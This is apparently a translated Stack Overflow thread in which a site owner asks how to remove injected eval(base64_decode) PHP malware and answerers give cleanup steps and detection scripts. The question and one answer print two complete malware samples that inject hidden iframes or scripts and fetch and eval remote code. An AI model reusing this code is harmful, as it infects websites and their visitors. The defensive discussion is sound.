如何摆脱像PHP病毒文件一样的eval-base64_decode?

时间:2011-05-07 17:18:35

标签: php security virus deobfuscation malware-detection

我的网站(非常大的社区网站)最近感染了病毒。每个index.php文件都已更改,以便将这些文件的开头php标记更改为以下行:

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2x6cXFhcmtsLmNvLmNjL1FRa0ZCd1FHRFFNR0J3WUFFa2NKQlFjRUFBY0RBQU1CQnc9PSIgd2lkdGg9IjIiIGhlaWdodD0iMiI+PC9pZnJhbWU+PC9kaXY+JzsNCn0='));

当我解码它时,它产生了以下PHP代码:

    <?php
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
    array("216.239.32.0","216.239.63.255"),
    array("64.68.80.0"  ,"64.68.87.255"  ),
    array("66.102.0.0",  "66.102.15.255"),
    array("64.233.160.0","64.233.191.255"),
    array("66.249.64.0", "66.249.95.255"),
    array("72.14.192.0", "72.14.255.255"),
    array("209.85.128.0","209.85.255.255"),
    array("198.108.100.192","198.108.100.207"),
    array("173.194.0.0","173.194.255.255"),
    array("216.33.229.144","216.33.229.151"),
    array("216.33.229.160","216.33.229.167"),
    array("209.185.108.128","209.185.108.255"),
    array("216.109.75.80","216.109.75.95"),
    array("64.68.88.0","64.68.95.255"),
    array("64.68.64.64","64.68.64.127"),
    array("64.41.221.192","64.41.221.207"),
    array("74.125.0.0","74.125.255.255"),
    array("65.52.0.0","65.55.255.255"),
    array("74.6.0.0","74.6.255.255"),
    array("67.195.0.0","67.195.255.255"),
    array("72.30.0.0","72.30.255.255"),
    array("38.0.0.0","38.255.255.255")
    );
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
    $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
    if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
    if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo '<div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://lzqqarkl.co.cc/QQkFBwQGDQMGBwYAEkcJBQcEAAcDAAMBBw==" width="2" height="2"></iframe></div>';
}

我已尝试过几种方法来清除病毒,甚至从备份中恢复,几分钟或几小时后文件就会被重新感染。你能帮我吗?

您对这种病毒了解多少?

是否存在用于安装和传播的已知安全漏洞?

上面的PHP代码实际上做了什么?

它嵌入iframe的网页有什么作用?

当然更重要的是:我该怎样做才能摆脱它?

请帮助,我们几乎已经没有想法和希望:(

UPDATE1 更多细节:一个奇怪的事情是:当我们第一次检查受感染的文件时。它们已被更改,但在某些情况下,它们在ftp程序中的修改时间显示为几天,几个月甚至几年前的最后一次访问!这怎么可能呢?它让我发疯了!

更新2 我认为在用户在Wordpress安装中安装插件后问题就出现了。从备份恢复并完全删除Wordpress文件夹和相关的数据库后问题似乎消失了。我们目前订阅了一项安全服务,他们正在调查这个问题,以确保黑客行为已经消失。感谢任何回复的人。

8 个答案:

答案 0 :(得分:47)

恢复和清除您网站的步骤(假设您有一个已知的良好备份)。

1)关闭网站

在进行补救工作之前,您需要基本关闭网站的大门。这样可以防止访问者获取恶意代码,查看错误消息等等。只是良好的做法。

您应该可以将以下内容放入webroot中的 .htaccess 文件中。 (用您自己的IP地址替换“!!您的IP地址!!” - 如果您不知道您的IP地址,请参阅http://icanhazip.com。)

order deny,allow
deny from all
allow from !!Your IP Address Here!!

2)从服务器下载所有文件的副本

将所有内容下载到好备份的单独文件夹中。这可能需要一段时间(取决于您的网站大小,连接速度等)。

3)下载并安装文件/文件夹比较实用程序

在Windows机器上,您可以使用WinMerge - http://winmerge.org/ - 它是免费且非常强大的。 在MacOS计算机上,查看Alternative.to

中可能的替换列表

4)运行文件/文件夹比较实用程序

你应该得到一些不同的结果:

  • 文件相同 - 当前文件与备份相同,因此不受影响。
  • 仅在左/右侧的文件 - 该文件仅存在于备份中(可能已从服务器中删除),或仅存在于服务器上(可能已由黑客注入/创建)。 / LI>
  • 文件不同 - 服务器上的文件与备份中的文件不同,因此可能已被您(为服务器配置)或黑客(注入代码)进行了修改。 / LI>

5)解决差异

(a.k.a“为什么我们都不能相处?”)

对于相同的文件,无需进一步操作。 对于仅存在于一侧的文件,请查看该文件并确定它们是否合法(即应该存在的用户上传,您可能添加的其他文件等) 对于不同的文件,请查看该文件(文件差异实用程序甚至可以显示已添加/修改/删除了哪些行),并查看服务器版本是否有效。覆盖(使用备份版本)任何包含恶意代码的文件。

6)检查您的安全预防措施

这是否就像更改您的FTP / cPanel密码一样简单,或者查看您对外部/非受控资源的使用(正如您所说,您正在执行大量的fgets,fopens等,您可能需要检查传递给的参数因为这是一种让脚本拉入恶意代码的方法等等。

7)检查网站工作

在更正受感染的文件并删除恶意文件后,抓住机会成为唯一一个查看网站的人,以确保所有内容仍按预期运行。

8)打开门

在第1步中反转 .htaccess 文件中所做的更改。请仔细观察。密切关注访问者和错误日志,看看是否有人试图触发删除的恶意文件等。

9)考虑自动检测方法

有一些解决方案,允许您在主机上执行自动检查(使用CRON作业),该检查将检测并详细说明发生的任何更改。有些是冗长的(你会收到一封电子邮件,每个文件都有变化),但你应该能够根据自己的需要调整它们:

10)预定备份并保留好支架

确保您在网站上执行了预定备份,并保留了一些备份,因此您可以根据需要采取不同的步骤。例如,如果您执行了每周备份,则可能需要保留以下内容:

  • 4 x每周备份
  • 4 x每月备份(您保留其中一个每周备份,可能是本月的第一周,作为每月备份)

如果您的某些人使用比代码注入攻击更具破坏性的东西攻击您的网站,这些将永远让您的生活更轻松。

哦,并且确保您备份数据库 - 很多站点都基于CMS,文件很好,但如果丢失/损坏它们后面的数据库,那么备份基本没用。

答案 1 :(得分:2)

首先,关闭您的网站,直到您可以弄清楚他是如何进入的,以及如何解决它。看起来它正在为您的客户提供恶意软件。

接下来,在php文件中搜索fgets,fopen,fputs,eval或system。我推荐notepad ++,因为它的“在文件中查找”功能。此外,请确保这是您修改PHP的唯一地方。您是否有要与之比较的离线副本?

答案 2 :(得分:2)

我遭受了同样的黑客工作。我也能够解密代码,当我得到不同的PHP代码时,我开始通过循环遍历站点中的每个php文件并删除eval调用来删除注入的php文本。我仍在调查我是如何开始的,但这是从我的网站解密后我的样子:

要解码每个php文件上的加密php脚本,请使用以下命令: http://www.opinionatedgeek.com/dotnet/tools/base64decode/

使用这个人格式化结果: http://beta.phpformatter.com/

要清理,您需要从每个php文件的顶部删除“eval”行,并从网站的基本文件夹中删除.log文件夹。

我发现了一个python脚本,我稍微修改了以删除php文件中的木马,所以我会在这里发布以供其他人使用: 来自线程的代码源:replace ALL instances of a character with another one in all files hierarchically in directory tree

import os
import re
import sys

def try_to_replace(fname):
    if replace_extensions: 
        return fname.lower().endswith(".php")
    return True


def file_replace(fname, pat, s_after):
    # first, see if the pattern is even in the file.
    with open(fname) as f:
        if not any(re.search(pat, line) for line in f):
            return # pattern does not occur in file so we are done.

    # pattern is in the file, so perform replace operation.
    with open(fname) as f:
        out_fname = fname + ".tmp"
        out = open(out_fname, "w")
        for line in f:
            out.write(re.sub(pat, s_after, line))
        out.close()
        os.rename(out_fname, fname)


def mass_replace(dir_name, s_before, s_after):
    pat = re.compile(s_before)
    for dirpath, dirnames, filenames in os.walk(dir_name):
        for fname in filenames:
            if try_to_replace(fname):
                print "cleaning: " + fname
                fullname = os.path.join(dirpath, fname)
                file_replace(fullname, pat, s_after)

if len(sys.argv) != 2:
    u = "Usage: rescue.py <dir_name>\n"
    sys.stderr.write(u)
    sys.exit(1)

mass_replace(sys.argv[1], "eval\(base64_decode\([^.]*\)\);", "")

使用类型

python rescue.py rootfolder

这是恶意脚本试图做的事情:

<?php

if (function_exists('ob_start') && !isset($_SERVER['mr_no'])) {
    $_SERVER['mr_no'] = 1;
    if (!function_exists('mrobh')) {
        function get_tds_777($url)
        {
            $content = "";
            $content = @trycurl_777($url);
            if ($content !== false)
                return $content;

            $content = @tryfile_777($url);
            if ($content !== false)
                return $content;
            $content = @tryfopen_777($url);
            if ($content !== false)
                return $content;
            $content = @tryfsockopen_777($url);
            if ($content !== false)
                return $content;
            $content = @trysocket_777($url);
            if ($content !== false)
                return $content;
            return '';
        }

        function trycurl_777($url)
        {
            if (function_exists('curl_init') === false)
                return false;
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            $result = curl_exec($ch);
            curl_close($ch);
            if ($result == "")
                return false;
            return $result;
        }
        function tryfile_777($url)
        {
            if (function_exists('file') === false)
                return false;
            $inc = @file($url);
            $buf = @implode('', $inc);
            if ($buf == "")
                return false;
            return $buf;
        }
        function tryfopen_777($url)
        {
            if (function_exists('fopen') === false)
                return false;
            $buf = '';
            $f   = @fopen($url, 'r');
            if ($f) {
                while (!feof($f)) {
                    $buf .= fread($f, 10000);
                }
                fclose($f);
            } else
                return false;
            if ($buf == "")
                return false;
            return $buf;
        }
        function tryfsockopen_777($url)
        {
            if (function_exists('fsockopen') === false)
                return false;
            $p    = @parse_url($url);
            $host = $p['host'];
            $uri  = $p['path'] . '?' . $p['query'];
            $f    = @fsockopen($host, 80, $errno, $errstr, 30);
            if (!$f)
                return false;
            $request = "GET $uri HTTP/1.0\n";
            $request .= "Host: $host\n\n";
            fwrite($f, $request);
            $buf = '';
            while (!feof($f)) {
                $buf .= fread($f, 10000);
            }
            fclose($f);
            if ($buf == "")
                return false;
            list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
            return $buf;
        }
        function trysocket_777($url)
        {
            if (function_exists('socket_create') === false)
                return false;
            $p    = @parse_url($url);
            $host = $p['host'];
            $uri  = $p['path'] . '?' . $p['query'];
            $ip1  = @gethostbyname($host);
            $ip2  = @long2ip(@ip2long($ip1));
            if ($ip1 != $ip2)
                return false;
            $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
            if (!@socket_connect($sock, $ip1, 80)) {
                @socket_close($sock);
                return false;
            }
            $request = "GET $uri HTTP/1.0\n";
            $request .= "Host: $host\n\n";
            socket_write($sock, $request);
            $buf = '';
            while ($t = socket_read($sock, 10000)) {
                $buf .= $t;
            }
            @socket_close($sock);
            if ($buf == "")
                return false;
            list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
            return $buf;
        }
        function update_tds_file_777($tdsfile)
        {
            $actual1 = $_SERVER['s_a1'];
            $actual2 = $_SERVER['s_a2'];
            $val     = get_tds_777($actual1);
            if ($val == "")
                $val = get_tds_777($actual2);
            $f = @fopen($tdsfile, "w");
            if ($f) {
                @fwrite($f, $val);
                @fclose($f);
            }
            if (strstr($val, "|||CODE|||")) {
                list($val, $code) = explode("|||CODE|||", $val);
                eval(base64_decode($code));
            }
            return $val;
        }
        function get_actual_tds_777()
        {
            $defaultdomain = $_SERVER['s_d1'];
            $dir           = $_SERVER['s_p1'];
            $tdsfile       = $dir . "log1.txt";
            if (@file_exists($tdsfile)) {
                $mtime = @filemtime($tdsfile);
                $ctime = time() - $mtime;
                if ($ctime > $_SERVER['s_t1']) {
                    $content = update_tds_file_777($tdsfile);
                } else {
                    $content = @file_get_contents($tdsfile);
                }
            } else {
                $content = update_tds_file_777($tdsfile);
            }
            $tds = @explode("\n", $content);
            $c   = @count($tds) + 0;
            $url = $defaultdomain;
            if ($c > 1) {
                $url = trim($tds[mt_rand(0, $c - 2)]);
            }
            return $url;
        }
        function is_mac_777($ua)
        {
            $mac = 0;
            if (stristr($ua, "mac") || stristr($ua, "safari"))
                if ((!stristr($ua, "windows")) && (!stristr($ua, "iphone")))
                    $mac = 1;
            return $mac;
        }
        function is_msie_777($ua)
        {
            $msie = 0;
            if (stristr($ua, "MSIE 6") || stristr($ua, "MSIE 7") || stristr($ua, "MSIE 8") || stristr($ua, "MSIE 9"))
                $msie = 1;
            return $msie;
        }
        function setup_globals_777()
        {
            $rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
            $mz = "/tmp/";
            if (!@is_dir($rz)) {
                @mkdir($rz);
                if (@is_dir($rz)) {
                    $mz = $rz;
                } else {
                    $rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
                    if (!@is_dir($rz)) {
                        @mkdir($rz);
                        if (@is_dir($rz)) {
                            $mz = $rz;
                        }
                    } else {
                        $mz = $rz;
                    }
                }
            } else {
                $mz = $rz;
            }
            $bot = 0;
            $ua  = $_SERVER['HTTP_USER_AGENT'];
            if (stristr($ua, "msnbot") || stristr($ua, "Yahoo"))
                $bot = 1;
            if (stristr($ua, "bingbot") || stristr($ua, "google"))
                $bot = 1;
            $msie = 0;
            if (is_msie_777($ua))
                $msie = 1;
            $mac = 0;
            if (is_mac_777($ua))
                $mac = 1;
            if (($msie == 0) && ($mac == 0))
                $bot = 1;
            global $_SERVER;
            $_SERVER['s_p1']     = $mz;
            $_SERVER['s_b1']     = $bot;
            $_SERVER['s_t1']     = 1200;
            $_SERVER['s_d1']     = base64_decode('http://ens122zzzddazz.com/');
            $d                   = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" . urlencode($_SERVER["PHP_SELF"]) . "&a=" . urlencode($_SERVER["HTTP_USER_AGENT"]);
            $_SERVER['s_a1']     = base64_decode('http://cooperjsutf8.ru/g_load.php') . $d;
            $_SERVER['s_a2']     = base64_decode('http://nlinthewood.com/g_load.php') . $d;
            $_SERVER['s_script'] = "nl.php?p=d";
        }
        setup_globals_777();
        if (!function_exists('gml_777')) {
            function gml_777()
            {
                $r_string_777 = '';
                if ($_SERVER['s_b1'] == 0)
                    $r_string_777 = '<script src="' . get_actual_tds_777() . $_SERVER['s_script'] . '"></script>';
                return $r_string_777;
            }
        }
        if (!function_exists('gzdecodeit')) {
            function gzdecodeit($decode)
            {
                $t     = @ord(@substr($decode, 3, 1));
                $start = 10;
                $v     = 0;
                if ($t & 4) {
                    $str = @unpack('v', substr($decode, 10, 2));
                    $str = $str[1];
                    $start += 2 + $str;
                }
                if ($t & 8) {
                    $start = @strpos($decode, chr(0), $start) + 1;
                }
                if ($t & 16) {
                    $start = @strpos($decode, chr(0), $start) + 1;
                }
                if ($t & 2) {
                    $start += 2;
                }
                $ret = @gzinflate(@substr($decode, $start));
                if ($ret === FALSE) {
                    $ret = $decode;
                }
                return $ret;
            }
        }
        function mrobh($content)
        {
            @Header('Content-Encoding: none');
            $decoded_content = gzdecodeit($content);
            if (preg_match('/\<\/body/si', $decoded_content)) {
                return preg_replace('/(\<\/body[^\>]*\>)/si', gml_777() . "\n" . '$1', $decoded_content);
            } else {
                return $decoded_content . gml_777();
            }
        }
        ob_start('mrobh');
    }
}

?> 

答案 3 :(得分:2)

要摆脱这些恶意PHP,您只需删除它们即可。如果文件被感染,您只需要删除看起来可疑的部分。

找到这些文件总是很棘手,因为通常在您的网络根目录中有多个文件。

通常,如果你看到某种混淆,那就是红色警报。

大多数恶意软件很容易根据他们使用的常见功能找到,其中包括:

  • base64_decode
  • lzw_decompress
  • eval

通过使用编码格式,它们会缩小尺寸,使非经验用户难以解码。

以下是一些grep命令,可能会找到最常见的恶意软件PHP代码:

grep -R return.*base64_decode  .
grep --include=\*.php -rn 'return.*base64_decode($v.\{6\})' .

您可以在服务器上运行这些命令,也可以在将网站同步到本地计算机后(通过FTP,例如ncftpget -R)运行这些命令。

或者使用专为查找此类恶意文件而设计的扫描工具,请参阅:PHP security scanners

出于教育目的,请查看以下PHP漏洞利用脚本集合,这些脚本在调查kenorb/php-exploit-scripts GitHub(受@Mattias original collection影响)的可用黑客服务器时找到。这将使您了解这些PHP可疑文件的外观,以便您可以了解如何在服务器上查找更多这些文件。

另见:

答案 4 :(得分:0)

  1. 确保更新任何流行的Web应用程序,如Wordpress或vBulletin。旧版本有许多漏洞可能导致您的服务器受到攻击,如果它们没有更新,它可能会再次发生。在此之前不得继续进行。

  2. 如果文件不断被替换,那么后台运行的是ro​​otkit或木马。该文件无法自我复制。你必须先摆脱rootkit。试试rkhunterchkrootkitLMD。将ps aux的输出与安全服务器进行比较,并检查/var/tmp/tmp是否有可疑文件。您可能必须重新安装操作系统。

  3. 确保管理服务器的所有工作站都是最新且干净的。请勿通过不安全的无线连接进行连接或使用纯文本身份验证(如FTP)(请改用SFTP)。仅使用https登录控制面板。

  4. 为防止再次发生这种情况,请运行csf或类似的防火墙,每日LMD次扫描,并随时了解服务器上所有应用程序的最新安全补丁程序。

    < / LI>

答案 5 :(得分:0)

我主持的网站/网站遭到类似攻击多次。

我介绍了我为解决这个问题所做的工作。我并不假装这是最好/最简单的方法,但是它起作用,从那以后我可以主动将球保持在我的领域。

  1. 尽快解决问题 我创建了一个非常简单的PHP脚本(它是在熨斗很烫的时候编写的,所以也许它不是最优化的代码,但它能很快解决问题): http://www.ecommy.com/web-security/clean-php-files-from-eval-infection

  2. 确保您知道此类内容何时再次发布。黑客使用SQL注入你安装的一个外部模块的各种aproaches来强制你的管理面板上的字典攻击或众所周知的密码模式,如1qaz ... qwerty ....等... 我在这里介绍脚本: http://www.ecommy.com/web-security/scan-for-malware-viruses-and-php-eval-based-infections

  3. cron条目类似于: 0 2 * * 5 / root / scripts / base64eval_scan&gt; / dev / null 2&gt;&amp; 1&amp;

  4. 我更新了网页,以便有人可以直接下载文件。 希望它对你有用,因为它适合我:)

答案 6 :(得分:0)

我有同样的问题,当我删除它时,代码自动生成。我做了这些步骤,它工作正常:

1-限制 SSH 访问

我看到一些 ssh 登录尝试,猜测可能与此恶意软件有关!

2- 启用 SELinux

记得为 nignx 权限访问文件配置 SElinux

3- 删除 eval(base64_decode(...))

从所有 index.php [从根文件夹、插件文件夹和 ....] 中删除包含 eval(base64_decode(...)) 的行

答案 7 :(得分:-1)

假设这是一个基于Linux的服务器并且您具有SSH访问权限,则可以运行此命令以删除有问题的代码:

find . -name "*.php" | xargs sed -i 's@eval[ \t]*([ \t]*base64_decode[ \t]*([ \t]*['"'"'"][A-Za-z0-9/_=+:!.-]\{1,\}['"'"'"][ \t]*)[ \t]*)[ \t]*;@@'

这涵盖了所有已知的base64实现,并且无论base64文本是用单引号还是双引号包围都可以使用

编辑:现在也可以使用内部空白